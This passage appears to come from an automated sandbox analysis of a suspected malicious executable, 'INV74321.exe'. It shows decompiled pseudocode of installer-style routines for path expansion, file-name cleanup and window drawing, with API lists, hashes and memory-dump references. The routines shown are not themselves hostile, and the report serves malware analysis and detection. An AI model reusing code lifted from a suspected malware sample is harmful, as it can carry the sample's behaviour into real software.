                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405ECB
                                                            • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\INV74321.exe,80000000,00000003), ref: 00405C94
                                                            • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                          • String ID: %s=%s$[Rename]
                                                          • API String ID: 2171350718-1727408572
                                                          • Opcode ID: c8a07bbf3a544e04db1531592beb9b39ed12da8dfdba65436ce2583c9172ea3a
                                                          • Instruction ID: 2ccb2bf8dd744840d543bbc1a34bde763c5e5f86f0f2c8118c993f85f4779e4e
                                                          • Opcode Fuzzy Hash: c8a07bbf3a544e04db1531592beb9b39ed12da8dfdba65436ce2583c9172ea3a
                                                          • Instruction Fuzzy Hash: 39310531600B15ABC2206B659D48F6B3A5CDF45755F14043BB981F62C2DF7CE9028AFD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040618A, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 199stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 72%
                                                          			E0040618A(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t38;
				CHAR* _t39;
				signed int _t41;
				char _t52;
				char _t53;
				char _t55;
				char _t57;
				void* _t65;
				char* _t66;
				signed int _t80;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				CHAR* _t90;
				void* _t92;
				signed int _t97;
				signed int _t99;
				void* _t100;

				_t92 = __esi;
				_t89 = __edi;
				_t65 = __ebx;
				_t38 = _a8;
				if(_t38 < 0) {
					_t86 =  *0x42ebfc; // 0x569dca
					_t38 =  *(_t86 - 4 + _t38 * 4);
				}
				_push(_t65);
				_push(_t92);
				_push(_t89);
				_t66 = _t38 +  *0x42f478;
				_t39 = 0x42e3c0;
				_t90 = 0x42e3c0;
				if(_a4 >= 0x42e3c0 && _a4 - 0x42e3c0 < 0x800) {
					_t90 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t88 =  *_t66;
					if(_t88 == 0) {
						break;
					}
					__eflags = _t90 - _t39 - 0x400;
					if(_t90 - _t39 >= 0x400) {
						break;
					}
					_t66 = _t66 + 1;
					__eflags = _t88 - 4;
					_a8 = _t66;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t90 = _t88;
							_t90 =  &(_t90[1]);
							__eflags = _t90;
						} else {
							 *_t90 =  *_t66;
							_t90 =  &(_t90[1]);
							_t66 = _t66 + 1;
						}
						continue;
					}
					_t41 =  *((char*)(_t66 + 1));
					_t80 =  *_t66;
					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
					_v24 = _t80;
					_v28 = _t80 | 0x00000080;
					_v16 = _t41;
					_v20 = _t41 | 0x00000080;
					_t66 = _a8 + 2;
					__eflags = _t88 - 2;
					if(_t88 != 2) {
						__eflags = _t88 - 3;
						if(_t88 != 3) {
							__eflags = _t88 - 1;
							if(_t88 == 1) {
								__eflags = (_t41 | 0xffffffff) - _t97;
								E0040618A(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
							}
							L42:
							_t90 =  &(_t90[lstrlenA(_t90)]);
							_t39 = 0x42e3c0;
							continue;
						}
						__eflags = _t97 - 0x1d;
						if(_t97 != 0x1d) {
							__eflags = (_t97 << 0xa) + 0x430000;
							E004060F7(_t90, (_t97 << 0xa) + 0x430000);
						} else {
							E00406055(_t90,  *0x42f428);
						}
						__eflags = _t97 + 0xffffffeb - 7;
						if(_t97 + 0xffffffeb < 7) {
							L33:
							E004063D2(_t90);
						}
						goto L42;
					}
					_t52 =  *0x42f42c;
					__eflags = _t52;
					_t99 = 2;
					if(_t52 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x42f4c4;
						if( *0x42f4c4 != 0) {
							_t99 = 4;
						}
						__eflags = _t80;
						if(__eflags >= 0) {
							__eflags = _t80 - 0x25;
							if(_t80 != 0x25) {
								__eflags = _t80 - 0x24;
								if(_t80 == 0x24) {
									GetWindowsDirectoryA(_t90, 0x400);
									_t99 = 0;
								}
								while(1) {
									__eflags = _t99;
									if(_t99 == 0) {
										goto L30;
									}
									_t53 =  *0x42f424;
									_t99 = _t99 - 1;
									__eflags = _t53;
									if(_t53 == 0) {
										L26:
										_t55 = SHGetSpecialFolderLocation( *0x42f428,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
										__eflags = _t55;
										if(_t55 != 0) {
											L28:
											 *_t90 =  *_t90 & 0x00000000;
											__eflags =  *_t90;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t90);
										_v12 = _t55;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t57 =  *_t53( *0x42f428,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
									__eflags = _t57;
									if(_t57 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t90, 0x400);
							goto L30;
						} else {
							E00405FDE((_t80 & 0x0000003f) +  *0x42f478, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f478, _t90, _t80 & 0x00000040);
							__eflags =  *_t90;
							if( *_t90 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E0040618A(_t66, _t90, _t99, _t90, _v16);
							L30:
							__eflags =  *_t90;
							if( *_t90 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t52 - 0x5a04;
					if(_t52 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t90 =  *_t90 & 0x00000000;
				if(_a4 == 0) {
					return _t39;
				}
				return E004060F7(_a4, _t39);
			}



























                                                          0x0040618a
                                                          0x0040618a
                                                          0x0040618a
                                                          0x00406190
                                                          0x00406195
                                                          0x00406197
                                                          0x004061a6
                                                          0x004061a6
                                                          0x004061ae
                                                          0x004061af
                                                          0x004061b0
                                                          0x004061b1
                                                          0x004061b4
                                                          0x004061bc
                                                          0x004061be
                                                          0x004061d5
                                                          0x004061d8
                                                          0x004061d8
                                                          0x004063af
                                                          0x004063af
                                                          0x004063b3
                                                          0x00000000
                                                          0x00000000
                                                          0x004061e5
                                                          0x004061eb
                                                          0x00000000
                                                          0x00000000
                                                          0x004061f1
                                                          0x004061f2
                                                          0x004061f5
                                                          0x004061f8
                                                          0x004063a2
                                                          0x004063ac
                                                          0x004063ae
                                                          0x004063ae
                                                          0x004063a4
                                                          0x004063a6
                                                          0x004063a8
                                                          0x004063a9
                                                          0x004063a9
                                                          0x00000000
                                                          0x004063a2
                                                          0x004061fe
                                                          0x00406202
                                                          0x00406212
                                                          0x00406219
                                                          0x0040621c
                                                          0x00406224
                                                          0x00406227
                                                          0x0040622e
                                                          0x0040622f
                                                          0x00406232
                                                          0x0040634f
                                                          0x00406352
                                                          0x00406382
                                                          0x00406385
                                                          0x0040638a
                                                          0x0040638e
                                                          0x0040638e
                                                          0x00406393
                                                          0x00406399
                                                          0x0040639b
                                                          0x00000000
                                                          0x0040639b
                                                          0x00406354
                                                          0x00406357
                                                          0x0040636c
                                                          0x00406373
                                                          0x00406359
                                                          0x00406360
                                                          0x00406360
                                                          0x0040637b
                                                          0x0040637e
                                                          0x00406347
                                                          0x00406348
                                                          0x00406348
                                                          0x00000000
                                                          0x0040637e
                                                          0x00406238
                                                          0x0040623f
                                                          0x00406241
                                                          0x00406242
                                                          0x0040625c
                                                          0x0040625c
                                                          0x00406263
                                                          0x00406263
                                                          0x0040626a
                                                          0x0040626e
                                                          0x0040626e
                                                          0x0040626f
                                                          0x00406271
                                                          0x004062aa
                                                          0x004062ad
                                                          0x004062bd
                                                          0x004062c0
                                                          0x004062c8
                                                          0x004062ce
                                                          0x004062ce
                                                          0x0040632d
                                                          0x0040632d
                                                          0x0040632f
                                                          0x00000000
                                                          0x00000000
                                                          0x004062d2
                                                          0x004062d9
                                                          0x004062da
                                                          0x004062dc
                                                          0x004062f6
                                                          0x00406304
                                                          0x0040630a
                                                          0x0040630c
                                                          0x0040632a
                                                          0x0040632a
                                                          0x0040632a
                                                          0x00000000
                                                          0x0040632a
                                                          0x00406312
                                                          0x0040631b
                                                          0x0040631e
                                                          0x00406324
                                                          0x00406328
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406328
                                                          0x004062de
                                                          0x004062e1
                                                          0x00000000
                                                          0x00000000
                                                          0x004062f0
                                                          0x004062f2
                                                          0x004062f4
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004062f4
                                                          0x00000000
                                                          0x0040632d
                                                          0x004062b5
                                                          0x00000000
                                                          0x00406273
                                                          0x0040628e
                                                          0x00406293
                                                          0x00406296
                                                          0x00406336
                                                          0x00406336
                                                          0x0040633a
                                                          0x00406342
                                                          0x00406342
                                                          0x00000000
                                                          0x0040633a
                                                          0x004062a0
                                                          0x00406331
                                                          0x00406331
                                                          0x00406334
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406334
                                                          0x00406271
                                                          0x00406244
                                                          0x00406248
                                                          0x00000000
                                                          0x00000000
                                                          0x0040624a
                                                          0x0040624e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406250
                                                          0x00406254
                                                          0x00000000
                                                          0x00406256
                                                          0x00406256
                                                          0x00000000
                                                          0x00406256
                                                          0x00406254
                                                          0x004063b9
                                                          0x004063c3
                                                          0x004063cf
                                                          0x004063cf
                                                          0x00000000

                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32 ref: 004062B5
                                                          • GetWindowsDirectoryA.KERNEL32(GHFGHFGHFDGDFGDFg,00000400,?,0042A070,00000000,00405256,0042A070,00000000), ref: 004062C8
                                                          • SHGetSpecialFolderLocation.SHELL32(00405256,74B5EA30,?,0042A070,00000000,00405256,0042A070,00000000), ref: 00406304
                                                          • SHGetPathFromIDListA.SHELL32(74B5EA30,GHFGHFGHFDGDFGDFg), ref: 00406312
                                                          • CoTaskMemFree.OLE32(74B5EA30), ref: 0040631E
                                                          • lstrcatA.KERNEL32(GHFGHFGHFDGDFGDFg,\Microsoft\Internet Explorer\Quick Launch), ref: 00406342
                                                          • lstrlenA.KERNEL32(GHFGHFGHFDGDFGDFg,?,0042A070,00000000,00405256,0042A070,00000000,00000000,00422448,74B5EA30), ref: 00406394
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                          • String ID: GHFGHFGHFDGDFGDFg$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 717251189-3709218778
                                                          • Opcode ID: b81506d31a7a79703f981676f635a9404e1a7eaaabc2c3c435cbfeb6c21f0a75
                                                          • Instruction ID: 7f70e83a291e570019a42af90a820afb382591873456cc4d5332d159a7ba1b0c
                                                          • Opcode Fuzzy Hash: b81506d31a7a79703f981676f635a9404e1a7eaaabc2c3c435cbfeb6c21f0a75
                                                          • Instruction Fuzzy Hash: 58612470A00110AADF206F65CC90BBE3B75AB55310F52403FE943BA2D1C77C8962DB9E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004063D2, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E004063D2(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405AFC(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405ABA("*?|<>/\":", _t5))) == 0) {
							E00405C4B(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                          0x004063d4
                                                          0x004063dc
                                                          0x004063f0
                                                          0x004063f0
                                                          0x004063f6
                                                          0x00406403
                                                          0x00406403
                                                          0x00406404
                                                          0x00406406
                                                          0x0040640a
                                                          0x0040640c
                                                          0x00406415
                                                          0x00406417
                                                          0x00406431
                                                          0x00406439
                                                          0x00406439
                                                          0x0040643e
                                                          0x00406440
                                                          0x00406442
                                                          0x00406446
                                                          0x00406447
                                                          0x0040644a
                                                          0x00406452
                                                          0x00406454
                                                          0x00406458
                                                          0x00000000
                                                          0x00000000
                                                          0x0040645e
                                                          0x00406463
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406463
                                                          0x00406468

                                                          APIs
                                                          • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\INV74321.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                          • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                          • CharNextA.USER32(?,"C:\Users\user\Desktop\INV74321.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                          • CharPrevA.USER32(?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004063D3
                                                          • "C:\Users\user\Desktop\INV74321.exe" , xrefs: 0040640E
                                                          • *?|<>/":, xrefs: 0040641A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: "C:\Users\user\Desktop\INV74321.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 589700163-3874900187
                                                          • Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                          • Instruction ID: ed52d7626cbd5fe55056ecced6ac67fd73520a103458dc51ec5e44788bc33e0d
                                                          • Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                          • Instruction Fuzzy Hash: 6B1104518047A169FB3207380C40B7B7F888B97764F1A447FE8C6722C2C67C5CA796AD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004041E2, Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E004041E2(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                          0x004041f4
                                                          0x004042aa
                                                          0x00000000
                                                          0x004042aa
                                                          0x00404205
                                                          0x00404209
                                                          0x00000000
                                                          0x00404223
                                                          0x00404223
                                                          0x0040422c
                                                          0x00000000
                                                          0x00000000
                                                          0x0040422e
                                                          0x0040423a
                                                          0x0040423d
                                                          0x0040423d
                                                          0x00404243
                                                          0x00404249
                                                          0x00404249
                                                          0x00404255
                                                          0x0040425b
                                                          0x00404262
                                                          0x00404265
                                                          0x00404268
                                                          0x0040426a
                                                          0x0040426a
                                                          0x00404272
                                                          0x00404278
                                                          0x00404278
                                                          0x00404282
                                                          0x00404287
                                                          0x0040428a
                                                          0x0040428f
                                                          0x00404292
                                                          0x00404292
                                                          0x004042a2
                                                          0x004042a2
                                                          0x00000000
                                                          0x004042a5

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                          • Instruction ID: 212a8ad98d70f233ee07b83b669a1ba7ccffb4b50a3226e4c630c70d8ffb5278
                                                          • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                          • Instruction Fuzzy Hash: 3B2165716007059BCB309F78DD08B5BBBF4AF85750B04896EFD96A22E0C738E814CB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040521E, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0040521E(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42ec04; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42f4f4;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E0040618A(0, _t39, 0x42a070, 0x42a070, _a4);
					}
					_t26 = lstrlenA(0x42a070);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42ebe8, 0x42a070);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42a070;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x42a070)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x42a070, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                          0x00405224
                                                          0x00405230
                                                          0x00405233
                                                          0x00405239
                                                          0x00405245
                                                          0x00405248
                                                          0x0040524b
                                                          0x00405251
                                                          0x00405251
                                                          0x00405257
                                                          0x0040525f
                                                          0x00405262
                                                          0x0040527f
                                                          0x00405283
                                                          0x0040528c
                                                          0x0040528c
                                                          0x00405296
                                                          0x0040529f
                                                          0x004052ab
                                                          0x004052b2
                                                          0x004052b6
                                                          0x004052b9
                                                          0x004052cc
                                                          0x004052da
                                                          0x004052da
                                                          0x004052de
                                                          0x004052e0
                                                          0x004052e3
                                                          0x00000000
                                                          0x004052e3
                                                          0x00405264
                                                          0x0040526c
                                                          0x00405274
                                                          0x0040527a
                                                          0x00000000
                                                          0x0040527a
                                                          0x00405274
                                                          0x00405262
                                                          0x004052ed

                                                          APIs
                                                          • lstrlenA.KERNEL32(0042A070,00000000,00422448,74B5EA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                          • lstrlenA.KERNEL32(00403233,0042A070,00000000,00422448,74B5EA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                          • lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00422448,74B5EA30), ref: 0040527A
                                                          • SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2531174081-0
                                                          • Opcode ID: d1e8e7ce2c2523d172669f7ce86ee08a3412313cfa29fa6867aa2e5f83f46da0
                                                          • Instruction ID: 52f605d016cfd88bb70700c5a478074e15cc738f975766ab4ed8c3314b346ff2
                                                          • Opcode Fuzzy Hash: d1e8e7ce2c2523d172669f7ce86ee08a3412313cfa29fa6867aa2e5f83f46da0
                                                          • Instruction Fuzzy Hash: C721AC71900518BBDF119FA5DD8599FBFA8EF04354F1480BAF804B6291C7798E50CF98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00404ACE, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00404ACE(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                          0x00404adc
                                                          0x00404ae9
                                                          0x00404aef
                                                          0x00404b2d
                                                          0x00404b2d
                                                          0x00404b3c
                                                          0x00404b43
                                                          0x00000000
                                                          0x00404b45
                                                          0x00404af1
                                                          0x00404b00
                                                          0x00404b08
                                                          0x00404b0b
                                                          0x00404b1d
                                                          0x00404b23
                                                          0x00404b2a
                                                          0x00000000
                                                          0x00404b2a
                                                          0x00000000

                                                          APIs
                                                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AE9
                                                          • GetMessagePos.USER32 ref: 00404AF1
                                                          • ScreenToClient.USER32 ref: 00404B0B
                                                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404B1D
                                                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B43
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                          • Instruction ID: cdc5f22e578355ebae6afd16dcadc4be4e42c2ab1ff41a6041c2d58f87c209b7
                                                          • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                          • Instruction Fuzzy Hash: 33014C71900219BADB01DBA4DD85BFEBBBCAF55715F10012ABA40B61D0D6B4A9018BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

